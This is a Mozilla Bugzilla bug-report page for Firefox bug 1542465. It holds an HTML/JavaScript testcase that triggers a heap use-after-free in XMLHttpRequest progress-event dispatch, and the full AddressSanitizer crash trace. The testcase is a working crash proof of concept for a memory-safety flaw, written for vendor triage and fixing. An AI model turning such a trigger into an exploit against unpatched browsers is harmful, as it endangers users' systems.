Bug 1542465 Comment 0 Edit History

Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.

Original comment by

Nils

on 2019-04-05 23:36:15 PDT

(Hidden by Administrator)

Revision 1 by

Boris Zbarsky [:bzbarsky]

on 2019-04-12 10:23:34 PDT

The following testcase crashes the latest ASAN build of Firefox 68.0a1 (SourceStamp=93075ec49df3982c26873b822d762bd3d8863fad). It requires a fuzzing build (--enable-fuzzing) and the pref `user_pref("fuzzing.enabled",true)`. I am using a Python2 webserver (`python -m SimpleHTTPServer`) to host the testcase.

crash.html:
```
<script>
function spin() {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org/",false);
    try{x.send("X");}catch(e){}
}
function start() {
	o305=document.documentElement;
	o339=new XMLHttpRequest();
    o1155=new XMLHttpRequest();
	o339.open('GET','/a'+ "a".repeat(204811),true);
	o339.onreadystatechange=fun0;
	o339.send(undefined);
	o1537=o1155.upload;
	o1537.onprogress=fun1;
}
function fun0() {
    o1155.open('POST','/x' + "a".repeat(204811),true);
	o1155.send(o305);
}
function fun1() {
    window.dump(1);
	o1155.open('GET','/a'+'a'.repeat(101111),true);
	o1155.send(undefined);
    for(var x=0;x<10;x++) spin();
    o1155 = null;
    o1537 = null;
    o339 = null;
    o305 = null;
    FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
}
</script>
<body onload="start()"></body>
```
ASAN output:
=================================================================
==20801==ERROR: AddressSanitizer: heap-use-after-free on address 0x6170000c26c3 at pc 0x7f8f0918abbb bp 0x7ffe0541f310 sp 0x7ffe0541f308
WRITE of size 1 at 0x6170000c26c3 thread T0 (Web Content)
    #0 0x7f8f0918abba in mozilla::dom::XMLHttpRequestMainThread::DispatchProgressEvent(mozilla::DOMEventTargetHelper*, mozilla::dom::XMLHttpRequestMainThread::ProgressEventType, long, long) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:1227:26
    #1 0x7f8f091b3430 in mozilla::dom::XMLHttpRequestMainThread::HandleProgressTimerCallback() /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp
    #2 0x7f8f091b2e60 in mozilla::dom::XMLHttpRequestMainThread::Notify(nsITimer*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3400:5
    #3 0x7f8efee5dc51 in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:562:40
    #4 0x7f8efee5cfba in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:260:11
    #5 0x7f8efee35a15 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #6 0x7f8efee75a56 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1180:14
    #7 0x7f8efee7d71d in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #8 0x7f8f001df7c4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:110:5
    #9 0x7f8f000b4a9e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #10 0x7f8f000b4a9e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #11 0x7f8f000b4a9e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #12 0x7f8f096a21b3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #13 0x7f8f0dc6798e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #14 0x7f8f000b4a9e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #15 0x7f8f000b4a9e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #16 0x7f8f000b4a9e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #17 0x7f8f0dc66b1c in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:757:34
    #18 0x5645a6183834 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #19 0x5645a6183834 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:263
    #20 0x7f8f22d88b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #21 0x5645a60a8ebc in _start (/home/nils/browser/firefox/firefox/firefox+0x2debc)

0x6170000c26c3 is located 579 bytes inside of 688-byte region [0x6170000c2480,0x6170000c2730)
freed by thread T0 (Web Content) here:
    #0 0x5645a61509e2 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7f8efec38751 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2416:7
    #2 0x7f8efec36e03 in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2607:3
    #3 0x7f8efec437e2 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3582:3
    #4 0x7f8efec42a75 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3411:9
    #5 0x7f8efec47b16 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3947:21
    #6 0x7f8f036c0b8a in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1413:3
    #7 0x7f8f0604ef69 in mozilla::dom::FuzzingFunctions_Binding::cycleCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FuzzingFunctionsBinding.cpp:66:3
    #8 0x7f8f0df517c7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #9 0x7f8f0df517c7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
    #10 0x7f8f0f118e1d in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:3858:10
    #11 0x1cf31cd64887  (<unknown module>)
    #12 0x6210006391ff  (<unknown module>)
    #13 0x1cf31cd624de  (<unknown module>)
    #14 0x7f8f0f30f641 in EnterBaseline /builds/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:111:5
    #15 0x7f8f0f30f641 in js::jit::EnterBaselineAtBranch(JSContext*, js::InterpreterFrame*, unsigned char*) /builds/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:189
    #16 0x7f8f0df41b4d in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:1982:24
    #17 0x7f8f0df1bbe8 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #18 0x7f8f0df52138 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:562:13
    #19 0x7f8f0df53d82 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #20 0x7f8f0eb99e99 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2621:10
    #21 0x7f8f05d44e10 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:266:37
    #22 0x7f8f07014df2 in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #23 0x7f8f07014df2 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #24 0x7f8f06fc4c4a in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1045:22
    #25 0x7f8f06fc7281 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1240:17
    #26 0x7f8f06fa73f0 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:355:5
    #27 0x7f8f06fa73f0 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #28 0x7f8f06fa5618 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #29 0x7f8f06fac383 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1046:11
    #30 0x7f8f06fb40a6 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp
    #31 0x7f8f06f5e770 in mozilla::DOMEventTargetHelper::DispatchEvent(mozilla::dom::Event&, mozilla::dom::CallerType, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/events/DOMEventTargetHelper.cpp:166:17
    #32 0x7f8f06fd9b8a in mozilla::dom::EventTarget::DispatchEvent(mozilla::dom::Event&) /builds/worker/workspace/build/src/dom/events/EventTarget.cpp:178:13
    #33 0x7f8f0918a909 in mozilla::dom::XMLHttpRequestMainThread::DispatchProgressEvent(mozilla::DOMEventTargetHelper*, mozilla::dom::XMLHttpRequestMainThread::ProgressEventType, long, long) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:1224:3

previously allocated by thread T0 (Web Content) here:
    #0 0x5645a6150d63 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x5645a61855fd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:68:15
    #2 0x7f8f09179593 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:131:10
    #3 0x7f8f09179593 in mozilla::dom::XMLHttpRequest::Constructor(mozilla::dom::GlobalObject const&, mozilla::dom::MozXMLHttpRequestParameters const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequest.cpp:45
    #4 0x7f8f059d5cbc in mozilla::dom::XMLHttpRequest_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:2553:64
    #5 0x7f8f0df54a2f in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442:13
    #6 0x7f8f0df54a2f in CallJSNativeConstructor /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:458
    #7 0x7f8f0df54a2f in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:651
    #8 0x7f8f0df399af in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3066:16
    #9 0x7f8f0df1bbe8 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:422:10
    #10 0x7f8f0df52138 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:562:13
    #11 0x7f8f0df53d82 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:605:8
    #12 0x7f8f0eb99e99 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2621:10
    #13 0x7f8f05d44e10 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:266:37
    #14 0x7f8f07014df2 in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #15 0x7f8f07014df2 in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #16 0x7f8f06fc4c4a in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1045:22
    #17 0x7f8f06fc7223 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1240:17
    #18 0x7f8f06fa73f0 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:355:5
    #19 0x7f8f06fa73f0 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #20 0x7f8f06fa5618 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #21 0x7f8f06fac383 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1046:11
    #22 0x7f8f09f589ba in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1098:7
    #23 0x7f8f0cdc3d8c in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6596:21
    #24 0x7f8f0cdc2eb8 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6397:7
    #25 0x7f8f0cdc8a27 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #26 0x7f8f01a51c25 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1313:3
    #27 0x7f8f01a5080c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:872:14
    #28 0x7f8f01a4b957 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:710:9
    #29 0x7f8f01a4ea55 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:598:5
    #30 0x7f8f01a50334 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #31 0x7f8eff11e6b2 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:568:22
    #32 0x7f8f032f68ca in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/Document.cpp:7821:18
    #33 0x7f8f032f68ca in mozilla::dom::Document::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/Document.cpp:7753
    #34 0x7f8f032f532f in mozilla::dom::Document::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/Document.cpp:4873:3
    #35 0x7f8f033fa8db in applyImpl<mozilla::dom::Document, void (mozilla::dom::Document::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1122:12
    #36 0x7f8f033fa8db in apply<mozilla::dom::Document, void (mozilla::dom::Document::*)()> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1128
    #37 0x7f8f033fa8db in mozilla::detail::RunnableMethodImpl<mozilla::dom::Document*, void (mozilla::dom::Document::*)(), true, (mozilla::RunnableKind)0>::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1174

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:1227:26 in mozilla::dom::XMLHttpRequestMainThread::DispatchProgressEvent(mozilla::DOMEventTargetHelper*, mozilla::dom::XMLHttpRequestMainThread::ProgressEventType, long, long)
Shadow bytes around the buggy address:
  0x0c2e80010480: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e80010490: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800104a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800104b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e800104c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c2e800104d0: fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd
  0x0c2e800104e0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa
  0x0c2e800104f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e80010500: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80010510: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e80010520: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==20801==ABORTING

Bugzilla

Quick Search

Bug 1542465 Comment 0 Edit History